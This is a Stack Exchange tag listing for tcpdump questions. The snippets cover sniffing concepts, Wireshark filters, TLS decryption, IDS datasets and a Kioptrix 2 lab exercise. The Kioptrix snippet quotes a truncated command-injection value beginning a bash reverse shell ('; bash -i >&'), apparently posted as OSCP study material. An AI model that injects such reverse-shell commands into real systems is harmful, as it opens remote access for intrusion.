IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [tcpdump]

Tcpdump prints out a description of the contents of packets on a network interface that match the boolean expression; the description is preceded by a time stamp, printed, by default, as hours, minutes, seconds, and fractions of a second since midnight.

tcpdump is a common packet analyzer that runs under the command line. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Distributed under the BSD license, tcpdump is free software.

Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, macOS, HP-UX, Android and AIX among others. In those systems, tcpdump uses the libpcap library to capture packets. The port of tcpdump for Windows is called WinDump; it uses WinPcap, the Windows port of libpcap.

source Wikipedia:

9 questions
12
votes
4 answers

Eavesdropping vs. sniffing

I'm taking a coursera course, and they take pains when talking about network security to distinguish between eavesdropping and sniffing. According to their definitions, sniffing involves reading or monitoring whole packets, whereas eavesdropping…
fox
  • 243
  • 2
  • 6
10
votes
1 answer

Wireshark tcp filter: tcp[((tcp[12:1] & 0xf0) >> 2):4]

While reading this doc https://wiki.wireshark.org/CaptureFilters I found this line: tcp[((tcp[12:1] & 0xf0) >> 2):4] which figures out the TCP Header Length, but I can't find out how it really works (in detail). Can somebody explain it?
Neymour
  • 103
  • 1
  • 5
1
vote
2 answers

tcpdump packets have bad and incorrect checksums on localhost, how to investigate further?

Am investigating a macOS Catalina machine that is believed to be infected with malware. Have been viewing packets with tcpdump and noticed, on connecting to any web address, there are legit packet that gets sent to the DNS server... then... there…
lancealittlebit
  • 21
  • 1
  • 3
1
vote
0 answers

Capture Packets of other devices in network

I'm challenged to capture packets sent from a client to the gateway in a network. is it even possible to see the packets between client and gateway for me?
Simon Huenecke
  • 21
  • 1
1
vote
1 answer

Public Availability of a good Dataset in PCAP (TCPDUMP) format for IDS/IPS testing

I am trying to pass good reputable malicious traffic from an IPS. There are several sources on internet to explore datasets like the oldest I think DARPA set (not available in pcap format and not that efficient for modern day use) or NSL-KDD dataset…
aneela
  • 201
  • 3
  • 10
0
votes
0 answers

How to decrypt a tls1.3 tcp packets in wireshark

I generated the public and private key with openssl req -x509 -nodes -days 365 -newkey rsa:4096 -keyout server_key.pem -out cert.pem and I am using c sockets for the server and client with openssl, every thing works fine and I can capture the…
anon
  • 1
0
votes
0 answers

Creating half open or full open connection in presence of SYN cookie

Suppose an attacker knows that a target host uses SYN cookies. Can the attacker create half-open or fully open connections by simply sending an ACK packet to the target? Why or why not?
Hasnain Ali
  • 1
0
votes
0 answers

tcpdump in Kali Linux VM does not capture scp

I'm learning how to develop tests for a hardened server my company is developing for a client. The test configuration will consist of the test target (the server we're developing) and an external test laptop, which I'll use to run some test scripts.…
placebo_me_please
  • 1
0
votes
0 answers

Kioptrix 2: Why netcat reverse shell executed in web browser via command injection bug doesn't work?

I've completed kioptrix level 2 challenge via sql injection, command injection, bash reverse shell, and local privilege escalation as part of my OSCP preparation. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ ; bash -i >&…
Wolf
  • 347
  • 2
  • 3
  • 15